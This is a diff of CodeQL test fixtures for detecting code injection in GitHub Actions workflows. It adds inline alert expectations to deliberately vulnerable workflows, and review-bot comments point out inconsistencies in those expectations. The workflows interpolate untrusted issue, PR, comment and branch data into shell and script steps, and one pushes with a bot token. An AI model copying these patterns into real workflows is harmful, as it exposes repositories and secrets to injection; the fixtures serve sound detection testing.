@@ jobs: name: artifact # Save PR id to output - - name: Save artifact data + - name: Save artifact data # $ Source[actions/code-injection/critical] id: artifact run: echo "::set-output name=id::$(> $GITHUB_ENV + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV # $ Alert[actions/code-injection/medium] #If a target branch was found will run the action - if: env.destination_branch != 'invalid' 
@@ -50,7 +50,7 @@ jobs: git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} git cherry-pick -x ${{github.event.after}} --strategy-option theirs git push -u origin ${{env.auto_branch}} - hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" # $ Alert[actions/code-injection/medium] env: #Token used for the pull request. Corresponds to the DynamoBot account GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml index fdb140ec3802..d07398ebca72 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -4,5 +4,5 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml index 649d3a6e1319..5cdf5c0bf62d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml 
@@ -4,6 +4,6 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' - - run: echo '${{ github.event.comment.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml index b4c2ecaec700..0da70f8e2d4a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -81,7 +81,7 @@ jobs: git push \ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ - 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] env: BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} @@ -91,4 +91,4 @@ jobs: with: github-token: ${{ secrets.githubBotPAT }} script: | - const fileList = `${{ steps.git-commit.outputs.file-list }}` + const fileList = `${{ steps.git-commit.outputs.file-list }}` # $ Alert[actions/code-injection/critical] 
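Review bot: In the second publishResults.yml hunk the expectation on the `const fileList` line is appended with `#` inside a `script: |` block that holds JavaScript, where it is neither a YAML comment nor a JavaScript comment, so the marker becomes part of the script text under analysis. If the expectation parser accepts it, `// $ Alert[actions/code-injection/critical]` would keep the fixture valid JavaScript; otherwise a one-line YAML comment above the step, such as `# trailing "# $ ..." text inside the script is a test expectation, not code`, would make the intent clear. The same pattern appears on the `const log`, `const prevLog` and `const commentBody` lines in the reusable-workflow*.yml and level0.yml hunks. The step itself starts outside this hunk.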
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml index 0c4aa93c7a58..333af0376ca0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { 
@@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml index a952c8c1ab85..38a6bcbd6af5 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pages[1].title }}' - - run: echo '${{ github.event.pages[11].title }}' - - run: echo '${{ github.event.pages[0].page_name }}' - - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ github.event.pages[1].title }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[11].title }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[0].page_name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[2222].page_name }}' # $ Alert[actions/code-injection/medium] - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml index c8a30dad2944..4180c7d6769b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml 
@@ -15,7 +15,7 @@ jobs: - name: Extract and Clean Initial URL id: extract-url env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source[actions/code-injection/critical] run: | echo "::set-output name=initial_url::$BODY" @@ -34,4 +34,4 @@ jobs: - name: Update Comment with New URL run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 1ad46b0f6eb1..57df1a28983f 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml index 4f149a920419..d32f1f2c1a87 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml 
@@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml index 21fa789d9e7d..4d838b0d465a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -42,4 +42,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index b964bb78dac3..fc56cbc51211 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: 
@@ -41,4 +41,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml index d6b7b2b1b0c5..d075aecd67e7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml @@ -42,4 +42,4 @@ jobs: steps: - id: sink # Should not be reported since job1 is not needed - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml index 5e767ce0239f..348fe03ec72a 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml 
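Review bot: In the inter-job5.yml hunk the added `# $ Alert[actions/code-injection/medium]` contradicts the comment directly above it, which says the sink should not be reported because job1 is not needed. If the result is a known false positive, the expectation should say so: `run: echo ${{needs.job1.outputs.job_output}} # $ SPURIOUS: Alert[actions/code-injection/medium]`. If the query is now meant to report this sink, the old comment should be updated instead, so the fixture does not document two opposite intentions. The job definitions start outside the hunk, so the `needs` relationship cannot be confirmed from here.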
@@ -1,20 +1,20 @@ on: issues env: - global_env: ${{ github.event.issue.title }} + global_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] test: test jobs: echo-chamber: env: - job_env: ${{ github.event.issue.title }} + job_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.issue.title }}' - - run: echo '${{ github.event.issue.body }}' - - run: echo '${{ env.global_env }}' + - run: echo '${{ github.event.issue.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.global_env }}' # $ Alert[actions/code-injection/critical] - run: echo '${{ env.test }}' - - run: echo '${{ env.job_env }}' - - run: echo '${{ env.step_env }}' + - run: echo '${{ env.job_env }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ env.step_env }}' # $ Alert[actions/code-injection/critical] env: - step_env: ${{ github.event.issue.title }} + step_env: ${{ github.event.issue.title }} # $ Source[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml index b17a1fecbeb4..bfb4c4888624 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: ${{ github.event.comment.body == '/jira ticket' }} steps: - - run: echo ${{ github.event.comment.body }} + - run: echo ${{ github.event.comment.body }} # $ Alert[actions/code-injection/critical] - name: Login uses: atlassian/gajira-login@v3 
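Review bot: In the first json_wrap.yml hunk the job is guarded by `if: ${{ github.event.comment.body == '/jira ticket' }}`, so the value interpolated into `echo ${{ github.event.comment.body }}` appears to be limited to that literal whenever the step runs, yet the line is recorded as a plain `Alert`. If the query deliberately ignores such guards, a short comment would document that, for example `# equality guard on the job is not modelled by the query`. If the result is regarded as a false positive, `# $ SPURIOUS: Alert[actions/code-injection/critical]` would record it as one. The rest of the job lies outside the hunk.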
@@ -20,7 +20,7 @@ jobs: JIRA_API_TOKEN: ${{ secrets.JIRA_API_TOKEN }} - name: SearchParam - run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' + run: echo 'summary ~ ${{ toJSON(github.event.issue.title)}} AND project=${{ secrets.JIRA_PROJECT }}' # $ Alert[actions/code-injection/critical] - name: Search id: search diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml index ad9187a3d6bf..ad5d52fcb6bc 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level0.yml @@ -41,7 +41,7 @@ jobs: run: | echo "Checking issue body for profanities..." PROFANITIES_LIST="bad|disguting|horrible" - if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then + if echo "${{ github.event.issue.body }}" | grep -qiE "$PROFANITIES_LIST"; then # $ Alert[actions/code-injection/critical] echo "Profanity detected in issue body. Please clean up the language." exit 1 else @@ -66,7 +66,7 @@ jobs: uses: actions/github-script@v5 with: script: | - const commentBody = "${{ github.event.comment.body }}"; + const commentBody = "${{ github.event.comment.body }}"; # $ Alert[actions/code-injection/critical] let response; if (commentBody.includes("hello")) { response = "Hello! How can I help you today?"; diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml index 826051dfc5ac..bd378f614064 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/level1.yml 
@@ -34,4 +34,4 @@ jobs: pr-message: 'Message that will be displayed on users first pr' - name: Log test executions run: | - echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." + echo "Lint ran for branch ${{ github.event.workflow_run.head_branch }} in a PR from ${{ github.actor }}. Please check the logs for more information." # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml index 560e69f9e4b0..3ab37e1e4dba 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml @@ -11,4 +11,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo "${{ github.event.pull_request.body }}" + - run: echo "${{ github.event.pull_request.body }}" # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml index d4ce78856694..01af6deeaf20 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml 
@@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.event.review.body }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.review.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml index 5d288caad85d..1b08e4a18550 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml 
@@ -4,11 +4,11 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.event.comment.body }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml index 4ca3753f50cd..da99a837568e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml 
@@ -6,12 +6,12 @@ jobs: steps: - run: echo '${{ github.event.issue.title }}' # not defined for this trigger, so we should not report it - run: echo '${{ github.event.issue.body }}' # not defined for this trigger, so we should not report it - - run: echo '${{ github.event.pull_request.title }}' - - run: echo '${{ github.event.pull_request.body }}' - - run: echo '${{ github.event.pull_request.head.label }}' - - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' - - run: echo '${{ github.event.pull_request.head.repo.description }}' - - run: echo '${{ github.event.pull_request.head.repo.homepage }}' - - run: echo '${{ github.event.pull_request.head.ref }}' - - run: echo '${{ github.head_ref }}' + - run: echo '${{ github.event.pull_request.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.label }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.description }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.pull_request.head.ref }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.head_ref }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml index 2006a7999daf..97dfeb05c81b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml 
@@ -4,13 +4,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' - - run: echo '${{ github.event.commits[11].author.email }}' - - run: echo '${{ github.event.commits[11].author.name }}' - - run: echo '${{ github.event.head_commit.message }}' - - run: echo '${{ github.event.head_commit.author.email }}' - - run: echo '${{ github.event.head_commit.author.name }}' - - run: echo '${{ github.event.head_commit.committer.email }}' - - run: echo '${{ github.event.head_commit.committer.name }}' - - run: echo '${{ github.event.commits[11].committer.email }}' - - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml index 8b7a6df009c2..f459b9b51499 100644 
--- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push_and_workflow_dispatch.yml @@ -6,13 +6,13 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.commits[11].message }}' - - run: echo '${{ github.event.commits[11].author.email }}' - - run: echo '${{ github.event.commits[11].author.name }}' - - run: echo '${{ github.event.head_commit.message }}' - - run: echo '${{ github.event.head_commit.author.email }}' - - run: echo '${{ github.event.head_commit.author.name }}' - - run: echo '${{ github.event.head_commit.committer.email }}' - - run: echo '${{ github.event.head_commit.committer.name }}' - - run: echo '${{ github.event.commits[11].committer.email }}' - - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file + - run: echo '${{ github.event.commits[11].message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.message }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.author.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.head_commit.committer.name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.email }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.commits[11].committer.name }}' # $ Alert[actions/code-injection/medium] \ No newline at end of file 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml index 0c4aa93c7a58..34c2f156a099 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/medium] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/medium] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/medium] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { 
@@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/medium] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml index 0c4aa93c7a58..333af0376ca0 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] with: result-encoding: string script: | 
